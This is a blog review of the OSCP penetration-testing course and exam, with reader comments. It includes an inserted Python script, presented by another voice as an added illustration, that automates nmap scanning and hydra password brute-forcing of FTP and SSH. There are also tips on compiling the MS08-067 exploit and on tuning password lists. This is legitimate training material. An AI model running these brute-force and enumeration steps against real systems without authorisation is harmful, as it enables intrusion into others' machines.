Offensive Security’s PWB and OSCP — My Experience

Written on: October 9, 2013



Recently I took the Offensive Security Penetration Testing with Backtrack (PWB) course, passed the exam, and achieved the OSCP certification.  I learned a ton and earned my most rewarding cert yet.  There are several great reviews of the course but I figured I’d provide my perspective. 


In my current job I’m lucky enough to touch on all aspects of information security from policy and process development to application security testing. The latter (which is where I spend the majority of my time) requires that I keep my technical skills sharp.  I’m a big believer in training that takes a hands-on approach.  I’ve attended SANS training before but I had recently heard many good things about Offensive Security. The pricing of the courses made it an easy sell and the 90+ days of available lab time (you can extend it if desired) meant it would not be another cram-session course.  After reading several online reviews I decided this would be the next professional development course for me.

Course Registration

You can register for 30, 60, or 90 days of lab time — I chose 90. I registered in mid-June of this year and the timing was less than ideal as my wife was approaching her third trimester of pregnancy, meaning my anticipated exam time would be about two weeks before the baby was due. Definitely not the best for my stress levels, but I knew that if I didn't squeeze it in now, I might not have a chance to get it done for a while. Registration requires the use of a non-free email address (no gmail, yahoo, etc). Once you've applied for registration, you'll receive an email with some basic instructions and a link to continue the registration process. If you proceed, you'll receive a lab connectivity guide and software to test the VPN connectivity. They ask you to do this before you submit any payment to ensure you will have no problems accessing the lab environment. Once you've successfully tested your connection you can submit your payment. On the first day of your scheduled course, you'll receive an email with some more instructions as well as the course materials (PDF course guide and videos). You can visit the FAQ page which contains additional information about the registration process here:

Course Prerequisites 

The prerequisites for PWB as cited by Offsec are “a solid understanding of TCP/IP, networking and reasonable Linux skills”.  With that knowledge you should have no problem getting through the course but I do have some additional recommendations for prospective students to ensure you get the most out of your course time: 

You should be comfortable with scripting. 

I use scripting regularly in my day-to-day work and it proved very valuable during the course. You’ll find yourself repeating enumeration steps over and over and automating tasks via scripting saves so much time.  What language you choose is pretty much up to you but the majority of exploits you’ll run across will probably be written in either Python or Perl.  The course does cover bash scripting but it can’t hurt to familiarize yourself with it ahead of time if it’s not one of your strong suits.

You should be comfortable with Linux and Windows command line syntax. 

This wasn't an issue for me, but if necessary, take some time to ensure you can navigate the command line in both operating systems. There's a lot of material covered in the PWB course, so you don't want to be struggling with the basics at the same time.

You should be familiar with Assembly and a debugger

Since buffer overflows are just one of the many topics you’ll cover in the course this might be the least important of the recommendations but I think if you have some knowledge of Assembly and using a debugger you’ll be ahead of the game.  If you want to take a free crash course on Assembly check out  I recommend the Assembly Language Megaprimer for Linux, the Windows Assembly Language Megaprimer, and the Buffer Overflow Exploitation Megaprimer for Linux.  If you watch and comprehend these video series, you should have no problem tackling the basic buffer overflow exploits presented in the PWB course.

Get your “attacking” machine up and running. 

The course recommends the latest version of BackTrack, but I used the newest version of Kali with no problems. The directory structure is organized a bit differently, so you'll have to adapt accordingly when following along with the video lessons, but it's no big deal. I personally prefer virtualization, so I used a MacBook Pro running a Kali VM on VirtualBox. I would recommend updating the VM before you start the course and, once you have everything working, not touching it again until after you've completed the exam. You don't want a failed software update or misconfiguration to derail your progress.

Devise an organized note-taking and backup approach. 

Clear, thorough, and organized notes are a key to success. You’re going to cover a lot of material in a relatively short amount of time and when it comes time for the exam, you’ll be glad you kept yourself organized. I used KeepNote to organize all of my notes. It’s cross-platform (Windows, Mac, Linux), comes pre-installed on Kali and is very flexible. 

As I went through the course, I took notes and organized them accordingly.


When it came time to tackle the lab systems, I used a similar approach, tracking the enumeration and exploit activities for each machine, in detail. This proved valuable when it came time to write the report.


To ensure my notes were constantly backed up, I synced my KeepNote files with Dropbox (via an auto-sync folder on my host OS). This is also where I kept my PWB lab/exam report and backup copies of my screenshots. This way, I could access them from any machine and ensure I always had the most current copies. I also took regular snapshots of my Kali VM.

The Course

I would say there are really three components to the PWB course: the "scripted" course, the lab environment, and the exam. The course materials are fantastic: a 300+ page PDF Lab Guide with hours of accompanying videos. The idea is to go chapter by chapter, watching the videos, reading the course guide and performing the related exercises. You'll cover everything from service enumeration to buffer overflows, to password and Web Application attacks. You'll learn some pretty cool file transfer, port redirection, and tunneling methods. You'll be able to try your hand at almost all of the attacks in the lab, with the exception of ARP spoofing for obvious reasons (it would disrupt other students sharing the same lab network). If you want to see all of the topics covered in the course, check out the syllabus here.

You’ll also be given access to a Windows VM on which you can compile and test exploits before attempting them on the lab targets. In addition, you’re provided access to an online forum as well as IRC chat where you can usually find an Offsec admin online. I’ve read some course reviews by past students that used the forum/chat quite a bit and others not at all. I personally only used IRC once and that was when one of the machines was misconfigured and had to be fixed by an admin. Even though I didn’t use them a lot, I thought they were great resources to have available. Just don’t expect to get any answers or freebies.  From what I’ve read you might get a hint or more likely you might get the Offsec motto: “Try harder!”. Besides, it’s much more rewarding to figure out a really tough exploit on your own and it’s the best way to learn.  

I'm glad I registered for 90 days of lab time. As I went through each chapter, I found myself researching a lot of related topics and taking the time to test my own ideas. It was nice not having to worry about running out of time. There were some topics, such as Web Application attacks, that I was more comfortable with, so I spent considerably less time on these chapters. This afforded me even more time to research areas that I haven't had as much exposure to, such as port redirection and tunneling. That's the beauty of this course: it doesn't spoon feed you everything or force you to spend equal amounts of time on each topic. It presents the basics and encourages you to learn about each topic on your own. In many respects what you get out of the course is relative to how much effort you put in. In all, I spent about 30 days on the scripted course material.

A word about course documentation…

You will be required to submit a final report at the completion of the course (following your exam). This lab report will ultimately contain your completed course exercises, your lab work and your exam results. I can’t stress enough the importance of documenting your progress as you go.  Offsec provides you with a report template but don’t put it off until the last minute!  I’ve read some PWB course reviews from students that have had reports in excess of 500 pages – mine was about 260. 

If you don’t happen to perform penetration testing professionally, you’ll realize that Offsec is trying to impress upon you the importance of thorough and clear documentation.  Just remember that in addition to serving as proof of course completion, the assessment report should be able to walk the reader through the exploit and replicate it. Take notes, take screenshots and stay organized!  This is especially true for the lab and the exam.

The Lab Environment

You are given access to about 50 disparate systems (varying OS’s, service packs/kernels, 3rd party software, etc), each with its own remote and local vulnerabilities waiting to be discovered. These systems span multiple networks, several of which are only accessible via exploitation and the various port redirection/tunneling techniques covered in the course. You should make an effort to access all networks, including Admin, and exploit as many systems as possible. 

The course material introduces you to many of the enumeration and exploit methods you’ll need to exploit these systems and the lab is your chance to put that knowledge into practice (and continue to learn much more!).

Some systems you might exploit relatively easily while others (with names like Pain and Sufferance) will put you to the test. My advice is to avoid Metasploit as much as possible. If you exploit a system with Metasploit, see if you can find the same exploit on and try again. You'll learn so much more and it will help you when it comes time for the exam. Familiarize yourself with Exploit Database and SecurityFocus as they'll be invaluable resources for finding relevant exploits.

I recommend reverting each lab system (restoring it to its clean snapshot via the lab control panel, not merely rebooting it) before you try to exploit it. Remember that you're in a lab environment with other students making changes to the same systems. There were a couple of instances when I forgot to revert a system and thought I had discovered an exploit only to find out it was put there by someone else. There will be times when you're working on a system and someone else reverts it. While it is frustrating, it's a fairly rare occurrence because there are so many systems across multiple lab networks and you're limited in the number of available reverts per day (so use them sparingly!).

Another piece of advice is to enumerate, enumerate and then enumerate some more! This goes for both pre- and post-exploit.  Once you’ve got root on a system, don’t just move to the next one. Remember, the lab is intended to mimic an organization’s network environment and you may find files or information on one system that will help you exploit others.  

I’ve said it already, but make sure you keep good notes for each system you exploit — document open ports/services, networking data, OS/service packs, detail your exploits step-by-step and record any goodies you find (password hashes, etc). Be sure to take screenshots as you go. I kept all of this information organized within KeepNote and then transferred it to the formatted lab report periodically. I recommend updating your lab report after every couple of systems you exploit so you don’t end up with a massive reporting task at the end.  

Different aspects of the lab will be challenging depending on your knowledge and experience.  For me, many of the web-based vulnerabilities came relatively easy but some of the Linux privilege escalation exploits were challenging (and that much more fun!).  I took the time to script the Linux privilege escalation enumeration step and learned a lot in the process (a bit more on that later).  

During the lab time, I probably invested about 4-5 hours a day during the week and 6 hours a day on the weekends. In addition to a full time job and a wife in the last trimester of pregnancy I can tell you I had a lot on my plate. I’ll also say that it was well worth it. You can certainly get by with less time but again, I took the opportunity to learn everything I could about each topic and delve into other related topics along the way. By about day 75 I had gained access to all networks (including Admin) and got root/SYSTEM on 42 systems (including most of the tougher ones such as Pain, Ghost, and Niky) with limited shell access to several more. I still had a couple of weeks remaining in the lab but I decided to take that time to prepare for the exam.

Exam Preparation

Exam prep really starts from day one of the course, but I took the last two weeks of my lab time to pull everything together and thoroughly test my scripts and exploits. Here are some recommendations:

Script your enumeration

You'll likely develop several custom scripts and use a variety of tools when enumerating in the lab. I chose to tie all of these together into one comprehensive script that could be launched against one or many targets. Here's a basic overview of what my script did:

  • TCP/UDP nmap scans to identify open ports/services for additional enumeration (see below)
  • DNS enumeration (via dig)
  • HTTP/S enumeration (via additional nmap scans and web file/directory brute forcing)
  • MS-SQL enumeration (via nmap)
  • SSH enumeration (account guessing via Hydra)
  • SNMP enumeration (via nmap and onesixtyone)
  • SMTP enumeration (via nmap and custom account guessing scripts)
  • SMB enumeration (via samrdump)
  • FTP enumeration (via nmap and hydra)

Of course you're only limited by your imagination and scripting skills, so I'm sure there are plenty of additional enumeration steps that you might think of automating. For me, the key was identifying the minimum tasks I wanted to perform while considering time and exam limitations (you won't be able to use automated vulnerability scanners such as Nexpose, Nessus, etc). As a result I made sure to craft the script to only run the applicable enumeration steps (based on the services found running) and omitted automated vulnerability tools. Having a single script that orchestrates and formats the output for all of these various scans saved me a ton of time. When it came time for my exam this proved especially useful because the exam guide gave specific instructions for one of the target systems, and while I was working on that system I launched my enumeration script against the rest of the target IPs. By the time I had gotten root on my first exam system, enumeration had completed for the rest.
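To show the shape such an orchestrator takes, here is an added example of the "scan first, then run only the follow-ups that match what nmap found" approach. It is my own illustration, not the author's recon script. The wordlist paths, the community-string file and the exact hydra, onesixtyone and samrdump.py invocations are assumptions to adapt to your own layout; the embedded grepable output is a constructed sample (TEST-NET addresses), and the live path requires nmap and root (for -sS). It deliberately contains no nikto/Nessus-style scanner, matching the exam restriction above.

```python
#!/usr/bin/env python3
"""Service-driven enumeration: scan first, then launch only the follow-up
checks that match the services nmap actually reported open."""
import re
import shlex
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor

# Wordlist paths are assumptions; point them at your own files.
USERLIST = "wordlists/userlist"
PASSLIST = "wordlists/passlist"

# nmap service name -> follow-up command templates ({t} target, {p} port).
# Deliberately no nikto/Nessus-style scanners, which the exam forbids.
FOLLOWUPS = {
    "ftp": ["nmap -p {p} --script ftp-anon,ftp-bounce {t}",
            "hydra -L %s -P %s -s {p} {t} ftp" % (USERLIST, PASSLIST)],
    "ssh": ["hydra -L %s -P %s -s {p} {t} ssh" % (USERLIST, PASSLIST)],
    "http": ["nmap -p {p} --script http-enum,http-headers {t}"],
    "https": ["nmap -p {p} --script http-enum,http-headers,ssl-cert {t}"],
    "smtp": ["nmap -p {p} --script smtp-commands,smtp-enum-users {t}"],
    "snmp": ["onesixtyone -c community.txt {t}"],
    "ms-sql-s": ["nmap -p {p} --script ms-sql-info {t}"],
    "microsoft-ds": ["samrdump.py {t}"],
    "domain": ["dig @{t} version.bind chaos txt"],
}

# One grepable-output line: "Host: <ip> (<name>)\tPorts: <list>\tIgnored State: ..."
GREP_LINE = re.compile(r"^Host: (\S+) .*?Ports: (.*?)(?:\s+Ignored.*)?$")

def parse_grepable(text):
    """Parse nmap -oG output into {host: [(port, proto, service), ...]},
    keeping only ports whose state is exactly 'open'."""
    hosts = {}
    for line in text.splitlines():
        m = GREP_LINE.match(line)
        if not m:
            continue
        host, found = m.group(1), []
        for entry in m.group(2).split(","):
            # port/state/proto/owner/service/rpcinfo/version/
            f = entry.strip().split("/")
            if len(f) >= 5 and f[1] == "open":
                found.append((int(f[0]), f[2], f[4]))
        hosts[host] = found
    return hosts

def plan_followups(hosts):
    """Expand the scan results into the concrete (host, command) list to run."""
    plan = []
    for host, ports in hosts.items():
        for port, _proto, service in ports:
            for tmpl in FOLLOWUPS.get(service, []):
                plan.append((host, tmpl.format(t=host, p=port)))
    return plan

def run(cmd, timeout=900):
    """Run one command and return its output; one failure must not kill the batch."""
    try:
        done = subprocess.run(shlex.split(cmd), capture_output=True,
                              text=True, timeout=timeout)
        return done.stdout + done.stderr
    except (subprocess.TimeoutExpired, OSError) as exc:
        return "ERROR running %r: %s" % (cmd, exc)

def enumerate_targets(targets, workers=4):
    """Full cycle: nmap service scan (root needed for -sS), then parallel follow-ups."""
    scan = run("nmap -sS -sV -oG - " + " ".join(targets))
    hosts = parse_grepable(scan)
    plan = plan_followups(hosts)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        outputs = list(pool.map(lambda hc: run(hc[1]), plan))
    return hosts, list(zip(plan, outputs))

# Constructed sample of nmap -oG output (TEST-NET addresses, not real hosts).
SAMPLE_GREPABLE = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.0.2.5 ()\tStatus: Up\n"
    "Host: 192.0.2.5 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.0.8/, "
    "22/filtered/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.2.3/"
    "\tIgnored State: closed (997)\n"
    "Host: 192.0.2.8 ()\tPorts: 161/open/udp//snmp//SNMPv1 server/\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        hosts, results = enumerate_targets(sys.argv[1:])
        for (host, cmd), out in results:
            print("=== %s :: %s\n%s" % (host, cmd, out))
    else:  # dry run: show the plan derived from the constructed sample
        for host, cmd in plan_followups(parse_grepable(SAMPLE_GREPABLE)):
            print(host, cmd)
```

Run it with no arguments to see the plan derived from the sample (two ftp checks, one http check, one snmp check; the filtered ssh port produces nothing), or with target IPs to run it for real. Keeping the nmap stage first and the follow-ups in a thread pool is what lets you start reading open ports while the slower brute-force steps are still running.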

Per request, I’m providing my enumeration scripts below.  Please note that these scripts come as-is with no promise of accuracy and no intent to update.  

Download: Recon Scan (version 1.0, 8.9 KiB)

Script your privilege escalation checks

Linux privilege escalation can be a complicated task as there are so many possible vectors. Running commands one-by-one is tedious and time-consuming, especially when you have to repeat it across many systems. Again, this was another prime opportunity to leverage the power of automation.

Here’s an overview of what my Linux privilege escalation script identified:

  • Basic system info (OS/Kernel/System name, etc)
  • Networking Info (ifconfig, route, netstat, etc)
  • Miscellaneous filesystem info (mount, fstab, cron jobs, etc)
  • User info (current user, all users, super users, command history, etc)
  • File and Directory permissions (world-writeable files/dirs, suid files, root home directory)
  • Files containing plaintext passwords 
  • Interesting files, processes and applications (all processes and packages, all processes run by root and the associated packages, sudo version, apache config file, etc)
  • All installed languages and tools (gcc, perl, python, nmap, netcat, wget, ftp, etc)
  • All relevant privilege escalation exploits (using a comprehensive dictionary of exploits with applicable kernel versions, software packages/processes, etc)

I wrote it in Python and uploaded it to each Linux system I compromised to automate all of my enumeration actions and, if necessary, privilege escalation exploit discovery. Per request, I've included a copy of the script for download below. Note that this script comes as-is with no promise of accuracy and no intent to update.

Download: Linux privilege escalation script (version 1.0, 24.7 KiB)

There are several other Linux and Windows privilege escalation scripts freely available and I did try a few, but writing my own allowed me to easily customize the checks I wanted to perform and taught me a great deal more. If you want to get some ideas for additional privilege escalation check out these resources:

Organize and pre-compile your exploits

I kept all of my exploits organized in a customized file structure on my Kali machine but taking the extra steps of pre-compiling and testing the Windows-based exploits really saved me time.  I made it a point to modify, compile, and test every remote and local Windows non-Metasploit exploit I could find.  I organized my compiled exploits and made a very basic chart with the exploit name, MSXX-XXXX number, Exploit-db number, and applicable Windows OS versions. 


During the exam if I came across a situation that required a remote or local Windows exploit, I could simply reference my chart and test the pre-compiled exploit.

Per request, I’ve uploaded an unformatted csv example below. Please note these only represent the exploits that I was able to compile and confirm. I make no guarantees regarding its accuracy or completeness.

Download: MS Privesc And Exploits Table (1.8 KiB)

The Exam

I registered for the exam about two weeks before my lab time ended. At your allotted exam start time (I chose 10 am on a Friday) you’ll receive the VPN connectivity pack and exam guide that provides instructions, identifies your target machines, and outlines any restrictions. As many other PWB review sites have stated, there are limitations on the use of Metasploit as well as automated vulnerability scanners such as Nexpose or Nessus so once again, don’t depend too heavily on these during your lab time! Don’t worry, you’ll get very specific instructions on what is and is not allowed when you receive your exam guide. You are allotted 24 hours for the exam, with an additional 24 hours to complete and submit your lab/exam report. Each of the target machines is assigned a point value and you need a minimum number of points to pass the exam. I’m not sure if these ever vary, but in my case I needed 70 out of 100 points to pass. In all, it took me 8 hours (with breaks) to accumulate enough points to pass the exam. I still had one more system that I had not exploited but I chose instead to finish and submit my report (which took about another 2 hours).  Though I was tempted to use the remaining 16 hours to get that last system, given that my wife was 9+ months pregnant, I wanted to avoid any scenario that involved me not finishing and submitting my report before she went into labor!  With the report submitted, I slept soundly that night and received confirmation of its receipt the following morning.  I received notification that I passed the exam and achieved the OSCP certification that Tuesday. 

As far as recommendations for the exam, remember to get plenty of rest the night before and take frequent breaks. I took one after every system I completed with a longer dinner break once I had accumulated enough points and before I completed my report. Try and focus on one system at a time but don’t get bogged down. If you get really stuck, move on to another system. Again, organizing my notes/scripts, automating the enumeration and pre-compiling the Windows exploits allowed me to really focus on relevant exploits without wasting too much time. 


This was the most fun and challenging course I've ever taken. It's also the most satisfying because, although the course material is excellent, much of what you accomplish is due to your own hard work and commitment to Try Harder! I learned a lot and I can't recommend it enough for anyone who wants access to a quality lab environment and to hone their pen-testing skills. Since exploit development is one of my areas of interest, I definitely plan on taking the Cracking the Perimeter course as well as the Advanced Web Attacks course (once it's offered online).

283 Comments

  1. Jason says:

    Thanks for the awesome review. I’m going through the course as we speak. I’m at a wall right now with getting any new machines owned. Do you think I could take a look at your scripts you used for enumeration? Would be really awesome.

    • Mike Czumak says:

      Absolutely Jason, I've updated the post to include my scripts. Just note that these were written for my personal use with no intention for portability, so updates to environmental variables (file paths, etc) will be necessary and I can't guarantee their results. The act of writing the scripts proved just as valuable as the scripts themselves, so I would encourage you to review their functionality and then go through the same exercise if you have the time.

      — Mike

      • Jason says:

        Awesome, thanks! Yea I learned a lot so far and learned about how to write the scripts. I just like to see what others have done and what their method of thinking is when looking at the scripts. Thanks again.

  2. Martin says:

    Great post! I’ll soon be scheduling the exam myself.

    With regards to the recon script, I had tried something similar myself… however, neither my attempt or this runs quick enough on my machine to even consider using it in its entirety in the exam.

    Did you really run this script as-is? If you did then I think I need a few more cores in the aging machine sitting under the desk :).

    • Mike Czumak says:

      Thanks Martin. I did use the script pretty much as-is (commenting out any type of vuln-scanners like nikto since it’s not allowed for the exam). Since I used the python multiprocessor library I didn’t find it to be all that bad in terms of performance since each system is scanned simultaneously…especially with the small number of systems on the exam. I was running it on a VM w/ only 2gb of memory allocated; Mac host w/ 4gb total RAM, i7 processor. That being said, I purposefully run the nmap stuff first in the script to quickly get all of the open ports and running services so I can begin reviewing it as the script continues. The only thing that I found didn’t finish was the password cracking, but by then I had all I needed :). Believe me, it’s definitely not the most efficient and could probably use some serious attention from a better coder, but it served its purpose for me. If it really is running too slow you may decide to do something similar but only with nmap and none of the other service enumeration scripts. All the best on the exam! — Mike

  3. Todd says:

    Did you have any issues with the ftprecon portion? I seem to get tracebacks but I can’t find the culprit. With that said, I’m fairly new to python.

    • Mike Czumak says:

      I didn’t have any issues, but that’s not to say my code isn’t to blame. Since I never planned to distribute it I left out all error handling which is why you’re getting those tracebacks. One possible culprit is the hard-coded read/write locations. I took the quick route and hardcoded the read path to my wordlists as well as the write path to the results (wordlists/userlist, results/%s_ftphydra.txt, etc). If your dir structure is not the same, you’re going to get errors. If you want to post the originating error from the traceback I might be able to assist, though a Google search might also help, especially if you’re new to python.

      – Mike

      • Todd says:


        Thanks for being so willing to help. I see what you’re saying about the hard coding, but I looked through your code and matched my directory structure. I like the way you laid the code out regardless of maybe it not being the best way. It’s a good learning experience for me. I’m using it as a tool in that way. I’ve already owned a lot of the boxes but wanted to rerun some scans with scripting, etc. to look at better ways to do it. Here’s the error. I removed the IP in the paste just because:

        INFO: Performing nmap FTP script scan for XXX.XXX.XX.XXX
        Traceback (most recent call last):
        File “./”, line 14, in
        results = subprocess.check_output(FTPSCAN, shell=True)
        AttributeError: ‘module’ object has no attribute ‘check_output’

        What’s strange is that if I run the ftp script by itself, it completes fine. Thanks again.

        • Mike Czumak says:


          That error looks like an issue with the import statement. Since it's pointing to a function of the subprocess module, I'm guessing that's the culprit. I just tested it on my end and had no issues. What's weird is that none of the other scripts are raising the same exception, yet they all import the same. It's a long shot, but is it possible you have another module or file in your path or local folder called subprocess that might be causing a conflict? You can see your imports at runtime by running python with the "-v" switch (python -v Another shot in the dark, but you might try and add "from subprocess import *" to your import statements for just the ftpreconscan and see if that changes anything. If neither fix the issue, it still may be an import problem so you could research that further. Otherwise you may just want to run that one on its own. I'm afraid that without seeing it myself I won't be much more help.

          – Mike

  4. Todd says:

    The main area having trouble with now is a box that has a RAT but I can’t seem to pop. Can’t seem to get a read on the way in. 🙂

  5. Came across your priv checker script on one of the OS lab systems yesterday, and just wanted to say it’s a really useful script! Definitely going into my toolkit.

    Congrats on the OSCP. It sounds like we are in a similar situation, new baby due in four weeks and starting to sweat about taking the exam.

    • Mike Czumak says:

      Thanks for the feedback, glad you found the script useful. Big congrats on your upcoming new addition! I was definitely glad I was able to take the exam just in time. I was sweating it too but everything worked out perfectly in the end. Best of luck with the exam and more importantly with the new baby. — Mike

  6. ezee says:

    wow, thanks for taking the time to post this. I started PWB on the 22nd of DEC, and just finished the 113th video today. whew. I am switching to the PWK courseware on Jan 1st (free upgrade if you purchased after Nov), after which I plan to spend an additional 30 days on the pdf/videos again before moving on to a few months of labs. I will probably spend 6 months as well, I’m in no hurry.

    I’ve read about a 1/2 dozen posts like this today and reddit threads, and this is the most complete and helpful of the bunch.

    Mike can you also post your list shown here so that we may do the same? This is great advice.


    • Mike Czumak says:

      Thanks, I really appreciate the feedback and I’m glad you found it useful. Per your request, I’ve updated the post to include my list of MS exploits in unformatted CSV form. It represents all of the exploits I was able to compile, test, and confirm. Having this reference and the pre-compiled exploits at-the-ready was worth the prep time before the exam. Enjoy the course and best of luck on the exam. – Mike

  7. ezee says:

    Mike, I just can’t thank you enough for this helpful info, and appreciate how you took care to provide helpful info without any spoilers…that’s respectable.

  8. ezee says:

    xposted this blog entry in a related discussion on reddit.

    leaving this here for the google spiders.

  9. gd says:

    Thanks Mike for this interesting review. Especially Your MS exploits csv file. I would like to have more information about one of them (MS08-067 exploit db 7104). Could we exchange on it in private? I have some issues to compile correctly this exploit.
    Thanks for your reply and congratulations for your cert.

    • Mike Czumak says:

      Thanks for the feedback. If you're trying to compile 7104.c on Kali via wine and you're getting 'undefined reference' errors, make sure you include all of the necessary libraries: -lwsock32, -lrpcrt4 and -lmpr. You can always find out which library is the culprit by searching MSDN for the reference (e.g. "UuidFromString") and checking which library it belongs to. Alternatively, I just tested on Windows XP using Visual Studio 2010 and it compiled with no errors. I just sent you an email in case this didn't address your problem. — Mike

  10. gd says:

    Thanks mike.

    See my email.

    I’ll let you know.


  11. Vitor Durans says:

    Thanks for the great review Mike and congrats for your new certification.
    In your opinion, is this a certification for a more experienced professional, or can guys like me, who entered the infosec field not so long ago, take the course and be successful in the exam too?
    Best regards!

    • Mike Czumak says:

      Thanks Vitor. As you probably know, Offsec bills this as their entry-level course/cert with the caveat that “a solid understanding of TCP/IP, networking, and reasonable Linux skills are required” and I think this is pretty accurate. Just make sure you have a grasp on the fundamentals of networking, operating systems, and scripting so you can focus your course time on learning the “security-centric” material. I reference a few resources in the review, but there are plenty of others you can use to prepare. I think the good thing about this course is that if you have little to no experience in security you’re going to learn a lot and even if you are experienced, you can use the time to explore the topics in much greater depth. You might consider looking at the syllabus and if there are areas you are truly in the dark about, you can do a bit of pre-course self-study. That said, the videos and course guide do a great job of introducing and demoing the concepts and then it’s largely up to you to research and practice them until you feel you have a firm grasp. Remember, you can always extend the lab time if needed. Hope this helps. — Mike

      • Vitor Durans says:

        Thanks again Mike. So, I'm looking for a hands-on course. I've been working with the Linux OS at an ISP, so I think the TCP/IP, networking and Linux I can handle.
        I've also searched for other courses like the CEH from EC-COUNCIL; the syllabus from both is not so different, but in many of the reviews I've read about the CEH, people say that it is a little theoretical and could be more hands-on.
        Nowadays, I'm concerned about the skills a course can give me, and the certification comes as a consequence.
        So, do you think these skills can be obtained more from OffSec than EC-COUNCIL?
        Thanks again for the feedback.

        • Mike Czumak says:

          If it's a hands-on, practical application course you're looking for I personally would skip the CEH and go with the OSCP. I haven't taken the CEH exam, but I've read some of the material and taken plenty of multiple-choice style exams to know that it probably won't be what you're looking for. If you want to get an overview of some pen-testing/security concepts, buy or borrow a CEH exam prep guide and give it a read, but I think the OSCP is better suited for the skills you're after. You've got the right approach regarding skills vs. certification…you can get a lot out of the PWK/OSCP if you're willing to invest the time and the certification is an added bonus.

  12. Dave says:

    Great review! What can you say about the network secrets txt file?? Any advice?

    – Dave

    • Mike Czumak says:

      Thanks Dave. Advice about finding them? Enumeration, enumeration, enumeration! When you’ve popped a box, don’t be too quick to move on without looking around. Obviously there are only a handful of network-secrets.txt files so it’s a matter of rooting the right machines but if you don’t find it on the one you’re on, you may find other interesting data that will net you another owned box.

  13. Rich Baker says:

    Thanks for the great write-up. It’s very useful as I plan to pursue this as well. Also, congratulations on the baby!

  14. Chris says:

    Great review.
    I am in the course now, I have about 60+ days left on my labs, and zero scripting experience. I have been getting there each night as time permits to try and play, but I wonder if I am in over my head. For a novice, aside from the pdf and videos, are there other resources you might recommend to help prep for the exam?

    • Mike Czumak says:


      The course covers so much material, it’s difficult for me to provide a blanket list of other resources. I know you said “aside from the pdf and videos”, but you’ll definitely want to methodically review these resources carefully, perform the example exercises a few times, and figure out where your weaknesses lie. That way you can identify for which topics you need to consult other resources. It’s no coincidence that the first ~130 pages of the course guide cover the essential tools, enumeration techniques, and scanning. It’s key that you have a grasp on these concepts because they will play a major role in both the lab and the exam. The lab is a great playground that sets this course apart from others, but it will serve you well to approach this as if it were a real penetration test. Scan and enumerate, documenting your findings as you go. This is how you’ll organize your plan of attack for each system and find vulnerabilities and clues for others.

      For bash scripting you might want to have a look at the video “Bash Scripting 101 for Pen Testers” ( SecurityTube is a great resource for learning the basics of Assembly, Buffer Overflows, etc. They also have a relevant video from Mark Baggett on proxychains. For web application security, there are tons of great free sites out there. If you want a book, I’ve found no other single resource greater than The Web Application Hacker’s Handbook. For Buffer Overflows, I have some tutorials on my site (Windows-centric with more on the way) and Corelan Team’s site is also a fantastic resource. For scripts and cheatsheets (reverse shells, SQL injection, etc) check out FuzzySecurity recently posted a thorough tutorial on Windows Privilege Escalation ( Again, this is only a sample of the resources available out there. If you have an area in mind that you’d like to learn more about, let me know and maybe I can suggest others.

      Don’t get discouraged. You can get a lot out of this course if you work through the material slowly and practice applying the concepts in the lab. The hands-on application of the topics will benefit you a great deal.

      I hope this helps. – Mike

  15. Brad says:

    Did they change the timing? I thought you get a full 24 hours to pop the boxes and another full 24 to write the report.

    • Mike Czumak says:

      I didn’t hear that they changed the timing. Are you referring to something in my post or something you heard elsewhere?

  16. Chris says:

    @Brad –
    Here is what they told me on my welcome letter.

    You will have 23 hours, 45 minutes to hack a live lab environment similar to the exercises in the course
    * During the first hours of the challenge, one of our staff members will be online on IRC ( in the #offsec channel) and the Jabber network ( to assist you if problems arise.
    * You need to send your lab and exam report to within 24 hours of the end of the challenge

  17. Chris says:

    @Mike –
    Thank you for the very thorough reply! Loads of resources in there, which I will certainly check out. I check out the videos and pdf as I can during the day at work, then try to apply the labs at home in the evening. So far progress is slow, but with some of your scripts as examples, and the resources you mentioned, I may have found some new motivation. Many thanks! I have never really used IRC before; is it worth adding a client to talk it up in the offsec channel?

    • Mike Czumak says:

      You’re welcome. You certainly have nothing to lose by getting on IRC–you may get some useful guidance. Best of luck!

  18. Maxx says:

    Hi, can you also upload your userlist offsecpass list? Would be very nice. Thx for these awesome tips. Kind regards, Maxx

  19. ad says:

    Hi Mike,

    Thank you for your great review and I do agree that yours is the most comprehensive and helpful compared with others.

    With regard to exploit #7104 from exploitdb, I managed to compile it but it seems that it doesn’t work; the Win32 service on the target machine always crashed after receiving the shellcode.

    Do you mind sharing your .c and executable files with me via e-mail please?

    Thank you

    • Mike Czumak says:

      Thanks for the feedback! I’ve sent you an email re: 7104 -Mike

      • yassine says:

        Please, ad or Mike Czumak, I couldn’t manage to compile the 7104.c; could you share the .exe file with me!!

        • Mike Czumak says:

          Sorry, my compiled version didn’t execute w/o errors (see prior comment). – Mike

  20. Jay says:


    I need your advice on usage of password files. Text files like “rockyou” have an impressive list of potential passwords, but brute-forcing with these large files can take some time. For instance, I was trying to brute-force RDP with ncrack and the rockyou text file, and it seemed to take forever.

    From your experience, are we expected to use these large files for brute-forcing in the PWB/PWK course and exam? I am asking from a time-constraints perspective.

    • Mike Czumak says:

      The short answer is no, I would not necessarily default to a large file such as “rockyou” for every password guessing attempt. At the same time, it’s all about using your time wisely so if you identify an exposed service that you want to try a password guessing attack, you might try a larger list and while that’s running, focus your attention on another system or service. It partially depends on the service you are targeting — services such as RDP, telnet or others with response delays/timeouts/automatic disconnects can add significant time to the process and you don’t want to go overboard on your password list. For password audits in general (PWK course or otherwise) I recommend tailoring your password list as much as possible — usernames/passwords of already discovered and cracked accounts, keywords pertinent to your environment/users, etc. Start with as small a list as possible and work your way up to a larger list if necessary. For example, for this course I had one list that contained the most common passwords to which I continuously added any newly discovered username and cracked password that I found in the lab. I think you’ll find for the exam that you don’t need to go overboard and you always have the option to move to a larger list. Hope this helps. – Mike

  21. Jay says:

    Many Thanks, Mike

  22. Olivier says:

    Hi Mike,
    Thanks a lot for your feedback. You mentioned that it was not always possible or useful to use vulnerability scanners (Nessus, OpenVAS, etc.). So how did you select CVEs, exploits, payloads to compromise the targets? Please could you elaborate a little bit?
    Thanks in advance,

    • Mike Czumak says:


